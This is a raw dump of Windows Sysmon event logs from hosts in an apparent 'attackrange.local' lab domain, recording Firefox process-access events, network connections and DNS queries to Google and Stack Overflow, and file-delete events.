Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105885Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.414{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105884Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.412{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105883Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.412{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105882Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.411{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105881Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.411{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105880Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.411{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105879Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.410{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105878Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.402{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105877Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.402{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105876Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.402{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105875Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.397{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105874Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.397{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105873Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.397{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105872Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.206{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=0740CB671E00F88CB0A385D493377E24,SHA256=5462B551E01515CA81661E418B0D6BB9533C66F12632D806A737987F856DB1D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105871Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.395{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51800-false142.250.186.34fra24s04-in-f2.1e100.net443https 354300x8000000000000000105870Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.385{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local62774-false142.250.186.34fra24s04-in-f2.1e100.net443https 354300x8000000000000000105869Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.385{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61724- 354300x8000000000000000105868Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.382{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62773- 354300x8000000000000000105867Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.346{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51799-false142.250.185.130fra16s50-in-f2.1e100.net443https 354300x8000000000000000105866Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.345{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62801- 354300x8000000000000000105865Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.344{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49726- 354300x8000000000000000105864Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.262{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local61563-false216.58.212.130ams15s21-in-f2.1e100.net443https 354300x8000000000000000105863Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.226{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local61562-false142.250.74.206fra24s02-in-f14.1e100.net443https 354300x8000000000000000105862Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.217{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51798-false216.58.212.130ams15s21-in-f2.1e100.net443https 354300x8000000000000000105861Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.214{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61561- 354300x8000000000000000105860Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.214{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63835- 354300x8000000000000000105859Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.211{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61289- 354300x8000000000000000105858Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.199{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51037- 354300x8000000000000000105857Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.187{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51797-false142.250.74.206fra24s02-in-f14.1e100.net443https 354300x8000000000000000105856Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.186{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52150- 23542300x8000000000000000105855Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.013{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D271FD7765C7D31328B2CBC7AC02C68,SHA256=735BEB053456863B0B4A568E05E31E8A4CBFB4A899135604115E070661EECE2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082894Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:43.656{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE95E9A4EE24377DABF323FB7EC301B9,SHA256=4344C493F592909230308ACEAEF29A1D50A3A48BD72C9B8234249EBADC15AFAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105977Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.180{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50399- 354300x8000000000000000105976Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.179{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49353- 354300x8000000000000000105975Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.179{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58758- 354300x8000000000000000105974Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.179{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58821- 354300x8000000000000000105973Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.179{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57980- 354300x8000000000000000105972Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.798{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local64394-false142.250.181.238fra16s56-in-f14.1e100.net443https 22542200x8000000000000000105971Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.520{58E9C193-B422-615A-0602-00000000FC01}5552s0-2mdn-net.l.google.com0142.250.181.230;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105970Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.494{58E9C193-B422-615A-0602-00000000FC01}5552clc.stackoverflow.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105969Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.484{58E9C193-B422-615A-0602-00000000FC01}5552clc.stackoverflow.com0151.101.1.69;151.101.193.69;151.101.65.69;151.101.129.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105968Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.483{58E9C193-B422-615A-0602-00000000FC01}5552clc.stackoverflow.com0::ffff:151.101.129.69;::ffff:151.101.1.69;::ffff:151.101.193.69;::ffff:151.101.65.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105967Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.282{58E9C193-B422-615A-0602-00000000FC01}5552pagead-googlehosted.l.google.com02a00:1450:4001:830::2001;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105966Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.281{58E9C193-B422-615A-0602-00000000FC01}5552pagead-googlehosted.l.google.com0142.250.185.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105965Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.474{58E9C193-B422-615A-0602-00000000FC01}5552www-google-analytics.l.google.com02a00:1450:4001:82f::200e;C:\Program Files\Mozilla Firefox\firefox.exe 354300x8000000000000000105964Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.753{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local64393-false142.250.184.226fra24s12-in-f2.1e100.net443https 23542300x8000000000000000105963Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.534{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93CB72D589B7CA66E8FC737D00D1447B,SHA256=6882403FBC35E854636BF82F0A7F43D568C7376FD131BB21239EC39B7BCFFBC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105962Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.521{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105961Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.487{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105960Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.481{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105959Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.481{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105958Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.481{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 